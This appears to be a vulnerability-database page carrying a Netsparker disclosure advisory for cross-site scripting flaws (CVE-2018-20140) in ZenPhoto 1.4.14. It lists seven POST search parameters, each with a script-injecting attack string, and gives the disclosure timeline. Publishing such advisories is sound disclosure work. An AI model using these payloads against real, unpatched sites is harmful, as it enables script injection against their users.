Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormZekvan ArslanPACKETSTORM:151052
HistoryJan 08, 2019 - 12:00 a.m.

ZenPhoto 1.4.14 Cross Site Scripting

2019-01-0800:00:00
Zekvan Arslan
packetstormsecurity.com
32

0.005 Low

EPSS

Percentile

77.3%

JSON
`Multiple Cross-site Scripting Vulnerabilities in ZenPhoto 1.4.14  
  
Information  
--------------------  
  
Advisory by Netsparker  
Name: Multiple Cross-Site Scripting Vulnerabilities in ZenPhoto 1.4.14  
Affected Software: ZenPhoto  
Affected Versions: 1.4.14  
Homepage: http://www.zenphoto.org/  
Vulnerability: Cross-Site Scripting  
Severity: Medium  
Status: Fixed  
CVE-ID: CVE-2018-20140  
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L  
Netsparker Advisory Reference: NS-18-043  
  
Technical Details  
--------------------  
  
URL : http://{DOMAIN}/{PATH-OF-ZENPHOTO}/  
Parameter Name: SEARCH_state  
Parameter Type: POST  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x1)</scRipt>  
  
URL : http://{DOMAIN}/{PATH-OF-ZENPHOTO}/  
Parameter Name: SEARCH_country  
Parameter Type: POST  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x2)</scRipt>  
  
URL : http://{DOMAIN}/{PATH-OF-ZENPHOTO}/  
Parameter Name: SEARCH_city  
Parameter Type: POST  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x3)</scRipt>  
  
URL : http://{DOMAIN}/{PATH-OF-ZENPHOTO}/  
Parameter Name: SEARCH_title  
Parameter Type: POST  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x4)</scRipt>  
  
URL : http://{DOMAIN}/{PATH-OF-ZENPHOTO}/;  
Parameter Name: SEARCH_desc  
Parameter Type: POST  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x5)</scRipt>  
  
URL : http://{DOMAIN}/{PATH-OF-ZENPHOTO}/  
Parameter Name: SEARCH_location  
Parameter Type: POST  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x6)</scRipt>  
  
URL : http://{DOMAIN}/{PATH-OF-ZENPHOTO}/  
Parameter Name: SEARCH_tags  
Parameter Type: POST  
Attack Pattern: '"--></style></scRipt><scRipt>alert(0x7)</scRipt>  
  
For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).  
  
Advisory Timeline  
--------------------  
  
28th June 2018- First Contact  
13th December 2018 - Vendor Fixed  
8th January 2019 - Advisory Released  
  
Credits & Authors  
--------------------  
  
These issues have been discovered by Zekvan Arslan while testing Netsparker Web Application Security Scanner.  
  
About Netsparker  
--------------------  
  
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.  
  
`

Related

cve 1
nvd 1
prion 1
osv 1
cvelist 1
cve
cve
CVE-2018-20140
2019-03-21 16:00:34
nvd
nvd
CVE-2018-20140
2019-03-21 16:00:34
prion
prion
Cross site scripting
2019-03-21 16:00:00
osv
osv
CVE-2018-20140
2019-03-21 16:00:34
cvelist
cvelist
CVE-2018-20140
2019-03-17 20:00:25

0.005 Low

EPSS

Percentile

77.3%

JSON
Related for PACKETSTORM:151052
cve1nvd1prion1osv1cvelist1